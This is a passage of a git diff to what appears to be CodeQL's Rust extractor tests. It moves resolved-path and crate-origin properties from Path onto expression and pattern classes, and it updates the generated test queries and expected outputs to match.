b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql @@ -2,6 +2,12 @@ import codeql.rust.elements import TestUtils -from FormatTemplateVariableAccess x -where toBeTested(x) and not x.isUnknown() -select x +from FormatTemplateVariableAccess x, string hasResolvedPath, string hasResolvedCrateOrigin +where + toBeTested(x) and + not x.isUnknown() and + (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and + if x.hasResolvedCrateOrigin() + then hasResolvedCrateOrigin = "yes" + else hasResolvedCrateOrigin = "no" +select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql new file mode 100644 index 00000000000..8022e46e327 --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from FormatTemplateVariableAccess x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedCrateOrigin() diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql new file mode 100644 index 00000000000..916fb7da09b --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from FormatTemplateVariableAccess x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedPath() diff --git a/rust/ql/test/extractor-tests/generated/Path/Path.expected b/rust/ql/test/extractor-tests/generated/Path/Path.expected index dfc303c3293..21eeab9c7a3 100644 --- a/rust/ql/test/extractor-tests/generated/Path/Path.expected +++ b/rust/ql/test/extractor-tests/generated/Path/Path.expected @@ -1,26 +1,26 @@ -| gen_path.rs:5:9:5:18 | some_crate | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path.rs:5:9:5:31 | ...::some_module | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path.rs:5:9:5:42 | ...::some_item | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path.rs:6:5:6:7 | foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path.rs:6:5:6:12 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path_expr.rs:5:13:5:20 | variable | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_expr.rs:6:13:6:15 | foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_expr.rs:6:13:6:20 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path_expr.rs:7:13:7:15 | <...> | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_expr.rs:7:13:7:20 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path_expr.rs:7:14:7:14 | T | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_expr.rs:7:14:7:14 | T | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_expr.rs:8:13:8:30 | <...> | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_expr.rs:8:13:8:35 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path_expr.rs:8:14:8:20 | TypeRef | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_expr.rs:8:14:8:20 | TypeRef | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_pat.rs:5:11:5:11 | x | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_pat.rs:6:9:6:11 | Foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_pat.rs:6:9:6:16 | ...::Bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | -| gen_path_type.rs:5:14:5:16 | std | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_type.rs:5:14:5:29 | ...::collections | hasResolvedPath: | yes | hasResolvedCrateOrigin: | yes | hasQualifier: | yes | hasPart: | yes | -| gen_path_type.rs:5:14:5:48 | ...::HashMap::<...> | hasResolvedPath: | yes | hasResolvedCrateOrigin: | yes | hasQualifier: | yes | hasPart: | yes | -| gen_path_type.rs:5:40:5:42 | i32 | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_type.rs:5:45:5:47 | i32 | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_type.rs:6:14:6:14 | X | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | no | hasPart: | yes | -| gen_path_type.rs:6:14:6:20 | ...::Item | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasQualifier: | yes | hasPart: | yes | +| gen_path.rs:5:9:5:18 | some_crate | hasQualifier: | no | hasPart: | yes | +| gen_path.rs:5:9:5:31 | ...::some_module | hasQualifier: | yes | hasPart: | yes | +| gen_path.rs:5:9:5:42 | ...::some_item | hasQualifier: | yes | hasPart: | yes | +| gen_path.rs:6:5:6:7 | foo | hasQualifier: | no | hasPart: | yes | +| gen_path.rs:6:5:6:12 | ...::bar | hasQualifier: | yes | hasPart: | yes | +| gen_path_expr.rs:5:13:5:20 | variable | hasQualifier: | no | hasPart: | yes | +| gen_path_expr.rs:6:13:6:15 | foo | hasQualifier: | no | hasPart: | yes | +| gen_path_expr.rs:6:13:6:20 | ...::bar | hasQualifier: | yes | hasPart: | yes | +| gen_path_expr.rs:7:13:7:15 | <...> | hasQualifier: | no | hasPart: | yes | +| gen_path_expr.rs:7:13:7:20 | ...::foo | hasQualifier: | yes | hasPart: | yes | +| gen_path_expr.rs:7:14:7:14 | T | hasQualifier: | no | hasPart: | yes | +| gen_path_expr.rs:7:14:7:14 | T | hasQualifier: | no | hasPart: | yes | +| gen_path_expr.rs:8:13:8:30 | <...> | hasQualifier: | no | hasPart: | yes | +| gen_path_expr.rs:8:13:8:35 | ...::foo | hasQualifier: | yes | hasPart: | yes | +| gen_path_expr.rs:8:14:8:20 | TypeRef | hasQualifier: | no | hasPart: | yes | +| gen_path_expr.rs:8:14:8:20 | TypeRef | hasQualifier: | no | hasPart: | yes | +| gen_path_pat.rs:5:11:5:11 | x | hasQualifier: | no | hasPart: | yes | +| gen_path_pat.rs:6:9:6:11 | Foo | hasQualifier: | no | hasPart: | yes | +| gen_path_pat.rs:6:9:6:16 | ...::Bar | hasQualifier: | yes | hasPart: | yes | +| gen_path_type.rs:5:14:5:16 | std | hasQualifier: | no | hasPart: | yes | +| gen_path_type.rs:5:14:5:29 | ...::collections | hasQualifier: | yes | hasPart: | yes | +| gen_path_type.rs:5:14:5:48 | ...::HashMap::<...> | hasQualifier: | yes | hasPart: | yes | +| gen_path_type.rs:5:40:5:42 | i32 | hasQualifier: | no | hasPart: | yes | +| gen_path_type.rs:5:45:5:47 | i32 | hasQualifier: | no | hasPart: | yes | +| gen_path_type.rs:6:14:6:14 | X | hasQualifier: | no | hasPart: | yes | +| gen_path_type.rs:6:14:6:20 | ...::Item | hasQualifier: | yes | hasPart: | yes | diff --git a/rust/ql/test/extractor-tests/generated/Path/Path.ql b/rust/ql/test/extractor-tests/generated/Path/Path.ql index d84c2d86987..c5e1ba9d78a 100644 --- a/rust/ql/test/extractor-tests/generated/Path/Path.ql +++ b/rust/ql/test/extractor-tests/generated/Path/Path.ql @@ -2,18 +2,10 @@ import codeql.rust.elements import TestUtils -from - Path x, string hasResolvedPath, string hasResolvedCrateOrigin, string hasQualifier, string hasPart +from Path x, string hasQualifier, string hasPart where toBeTested(x) and not x.isUnknown() and - (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and - ( - if x.hasResolvedCrateOrigin() - then hasResolvedCrateOrigin = "yes" - else hasResolvedCrateOrigin = "no" - ) and (if x.hasQualifier() then hasQualifier = "yes" else hasQualifier = "no") and if x.hasPart() then hasPart = "yes" else hasPart = "no" -select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, - "hasQualifier:", hasQualifier, "hasPart:", hasPart +select x, "hasQualifier:", hasQualifier, "hasPart:", hasPart diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected b/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected index 4f6def5dd43..540ad015ddb 100644 --- a/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected +++ b/rust/ql/test/extractor-tests/generated/Path/PathExpr.expected @@ -1,6 +1,6 @@ -| gen_path.rs:6:5:6:12 | ...::bar | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:5:13:5:20 | variable | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:6:13:6:20 | ...::bar | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:7:13:7:20 | ...::foo | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_expr.rs:8:13:8:35 | ...::foo | getNumberOfAttrs: | 0 | hasPath: | yes | -| gen_path_pat.rs:5:11:5:11 | x | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path.rs:6:5:6:12 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path_expr.rs:5:13:5:20 | variable | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path_expr.rs:6:13:6:20 | ...::bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path_expr.rs:7:13:7:20 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path_expr.rs:8:13:8:35 | ...::foo | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | +| gen_path_pat.rs:5:11:5:11 | x | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfAttrs: | 0 | hasPath: | yes | diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql b/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql index 4d472add336..62db075a1ac 100644 --- a/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql +++ b/rust/ql/test/extractor-tests/generated/Path/PathExpr.ql @@ -2,10 +2,19 @@ import codeql.rust.elements import TestUtils -from PathExpr x, int getNumberOfAttrs, string hasPath +from + PathExpr x, string hasResolvedPath, string hasResolvedCrateOrigin, int getNumberOfAttrs, + string hasPath where toBeTested(x) and not x.isUnknown() and + (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and + ( + if x.hasResolvedCrateOrigin() + then hasResolvedCrateOrigin = "yes" + else hasResolvedCrateOrigin = "no" + ) and getNumberOfAttrs = x.getNumberOfAttrs() and if x.hasPath() then hasPath = "yes" else hasPath = "no" -select x, "getNumberOfAttrs:", getNumberOfAttrs, "hasPath:", hasPath +select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, + "getNumberOfAttrs:", getNumberOfAttrs, "hasPath:", hasPath diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.ql new file mode 100644 index 00000000000..24e07918484 --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from PathExpr x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedCrateOrigin() diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.ql new file mode 100644 index 00000000000..10e6ceb2a0b --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from PathExpr x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedPath() diff --git a/rust/ql/test/extractor-tests/generated/Path/PathPat.expected b/rust/ql/test/extractor-tests/generated/Path/PathPat.expected index 159f006eecb..cf90175a84c 100644 --- a/rust/ql/test/extractor-tests/generated/Path/PathPat.expected +++ b/rust/ql/test/extractor-tests/generated/Path/PathPat.expected @@ -1 +1 @@ -| gen_path_pat.rs:6:9:6:16 | ...::Bar | hasPath: | yes | +| gen_path_pat.rs:6:9:6:16 | ...::Bar | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | diff --git a/rust/ql/test/extractor-tests/generated/Path/PathPat.ql b/rust/ql/test/extractor-tests/generated/Path/PathPat.ql index 3e6cce8f151..a105c20c39e 100644 --- a/rust/ql/test/extractor-tests/generated/Path/PathPat.ql +++ b/rust/ql/test/extractor-tests/generated/Path/PathPat.ql @@ -2,9 +2,16 @@ import codeql.rust.elements import TestUtils -from PathPat x, string hasPath +from PathPat x, string hasResolvedPath, string hasResolvedCrateOrigin, string hasPath where toBeTested(x) and not x.isUnknown() and + (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and + ( + if x.hasResolvedCrateOrigin() + then hasResolvedCrateOrigin = "yes" + else hasResolvedCrateOrigin = "no" + ) and if x.hasPath() then hasPath = "yes" else hasPath = "no" -select x, "hasPath:", hasPath +select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, + "hasPath:", hasPath diff --git a/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.ql similarity index 91% rename from rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.ql rename to rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.ql index c998981364f..7ed41155d77 100644 --- a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.ql +++ b/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.ql @@ -2,6 +2,6 @@ import codeql.rust.elements import TestUtils -from Path x +from PathPat x where toBeTested(x) and not x.isUnknown() select x, x.getResolvedCrateOrigin() diff --git a/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedPath.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedPath.ql similarity index 91% rename from rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.ql rename to rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedPath.ql index c8969309836..cbe1932925a 100644 --- a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.ql +++ b/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedPath.ql @@ -2,6 +2,6 @@ import codeql.rust.elements import TestUtils -from Path x +from PathPat x where toBeTested(x) and not x.isUnknown() select x, x.getResolvedPath() diff --git a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.expected deleted file mode 100644 index df80e22f744..00000000000 --- a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.expected +++ /dev/null @@ -1,2 +0,0 @@ -| gen_path_type.rs:5:14:5:29 | ...::collections | lang:std | -| gen_path_type.rs:5:14:5:48 | ...::HashMap::<...> | lang:std | diff --git a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.expected deleted file mode 100644 index 7d1c698b0ce..00000000000 --- a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.expected +++ /dev/null @@ -1,2 +0,0 @@ -| gen_path_type.rs:5:14:5:29 | ...::collections | crate::collections | -| gen_path_type.rs:5:14:5:48 | ...::HashMap::<...> | crate::collections::hash::map::HashMap | diff --git a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.expected b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.expected index 445b906bf88..90cc595d61e 100644 --- a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.expected +++ b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.expected @@ -1,4 +1,4 @@ -| gen_record_expr.rs:5:17:5:34 | Foo {...} | hasPath: | yes | hasRecordExprFieldList: | yes | -| gen_record_expr.rs:6:18:6:38 | Foo {...} | hasPath: | yes | hasRecordExprFieldList: | yes | -| gen_record_expr.rs:7:5:7:22 | Foo {...} | hasPath: | yes | hasRecordExprFieldList: | yes | -| gen_record_expr.rs:8:5:8:14 | Foo {...} | hasPath: | yes | hasRecordExprFieldList: | yes | +| gen_record_expr.rs:5:17:5:34 | Foo {...} | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | hasRecordExprFieldList: | yes | +| gen_record_expr.rs:6:18:6:38 | Foo {...} | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | hasRecordExprFieldList: | yes | +| gen_record_expr.rs:7:5:7:22 | Foo {...} | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | hasRecordExprFieldList: | yes | +| gen_record_expr.rs:8:5:8:14 | Foo {...} | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | hasRecordExprFieldList: | yes | diff --git a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.ql b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.ql index 41cd6a41c4b..56c14f27dfd 100644 --- a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.ql +++ b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.ql @@ -2,12 +2,21 @@ import codeql.rust.elements import TestUtils -from RecordExpr x, string hasPath, string hasRecordExprFieldList +from + RecordExpr x, string hasResolvedPath, string hasResolvedCrateOrigin, string hasPath, + string hasRecordExprFieldList where toBeTested(x) and not x.isUnknown() and + (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and + ( + if x.hasResolvedCrateOrigin() + then hasResolvedCrateOrigin = "yes" + else hasResolvedCrateOrigin = "no" + ) and (if x.hasPath() then hasPath = "yes" else hasPath = "no") and if x.hasRecordExprFieldList() then hasRecordExprFieldList = "yes" else hasRecordExprFieldList = "no" -select x, "hasPath:", hasPath, "hasRecordExprFieldList:", hasRecordExprFieldList +select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, + "hasPath:", hasPath, "hasRecordExprFieldList:", hasRecordExprFieldList diff --git a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.ql new file mode 100644 index 00000000000..25635cb050f --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from RecordExpr x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedCrateOrigin() diff --git a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.ql new file mode 100644 index 00000000000..0f3230f3314 --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from RecordExpr x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedPath() diff --git a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.expected b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.expected index 8d7f96229ad..9b996be2368 100644 --- a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.expected +++ b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.expected @@ -1,2 +1,2 @@ -| gen_record_pat.rs:6:9:6:26 | Foo {...} | hasPath: | yes | hasRecordPatFieldList: | yes | -| gen_record_pat.rs:7:9:7:18 | Foo {...} | hasPath: | yes | hasRecordPatFieldList: | yes | +| gen_record_pat.rs:6:9:6:26 | Foo {...} | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | hasRecordPatFieldList: | yes | +| gen_record_pat.rs:7:9:7:18 | Foo {...} | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | hasRecordPatFieldList: | yes | diff --git a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.ql b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.ql index 19bc5ea6e3a..3b079777306 100644 --- a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.ql +++ b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.ql @@ -2,10 +2,19 @@ import codeql.rust.elements import TestUtils -from RecordPat x, string hasPath, string hasRecordPatFieldList +from + RecordPat x, string hasResolvedPath, string hasResolvedCrateOrigin, string hasPath, + string hasRecordPatFieldList where toBeTested(x) and not x.isUnknown() and + (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and + ( + if x.hasResolvedCrateOrigin() + then hasResolvedCrateOrigin = "yes" + else hasResolvedCrateOrigin = "no" + ) and (if x.hasPath() then hasPath = "yes" else hasPath = "no") and if x.hasRecordPatFieldList() then hasRecordPatFieldList = "yes" else hasRecordPatFieldList = "no" -select x, "hasPath:", hasPath, "hasRecordPatFieldList:", hasRecordPatFieldList +select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, + "hasPath:", hasPath, "hasRecordPatFieldList:", hasRecordPatFieldList diff --git a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.ql new file mode 100644 index 00000000000..f80865d0515 --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from RecordPat x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedCrateOrigin() diff --git a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.ql new file mode 100644 index 00000000000..a816942e47b --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from RecordPat x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedPath() diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected index a0d12cc8509..9fa41161bcb 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected @@ -1,3 +1,3 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | getNumberOfFields: | 4 | hasPath: | yes | -| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | getNumberOfFields: | 2 | hasPath: | yes | -| gen_tuple_struct_pat.rs:8:9:8:17 | TupleStructPat | getNumberOfFields: | 1 | hasPath: | yes | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfFields: | 4 | hasPath: | yes | +| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfFields: | 2 | hasPath: | yes | +| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfFields: | 1 | hasPath: | yes | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql index d12f3427df5..14ba21627af 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql @@ -2,10 +2,19 @@ import codeql.rust.elements import TestUtils -from TupleStructPat x, int getNumberOfFields, string hasPath +from + TupleStructPat x, string hasResolvedPath, string hasResolvedCrateOrigin, int getNumberOfFields, + string hasPath where toBeTested(x) and not x.isUnknown() and + (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and + ( + if x.hasResolvedCrateOrigin() + then hasResolvedCrateOrigin = "yes" + else hasResolvedCrateOrigin = "no" + ) and getNumberOfFields = x.getNumberOfFields() and if x.hasPath() then hasPath = "yes" else hasPath = "no" -select x, "getNumberOfFields:", getNumberOfFields, "hasPath:", hasPath +select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, + "getNumberOfFields:", getNumberOfFields, "hasPath:", hasPath diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected index 5885cbcea3e..21e1a701963 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected @@ -1,7 +1,7 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 0 | gen_tuple_struct_pat.rs:6:15:6:17 | "a" | -| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 1 | gen_tuple_struct_pat.rs:6:20:6:20 | 1 | -| 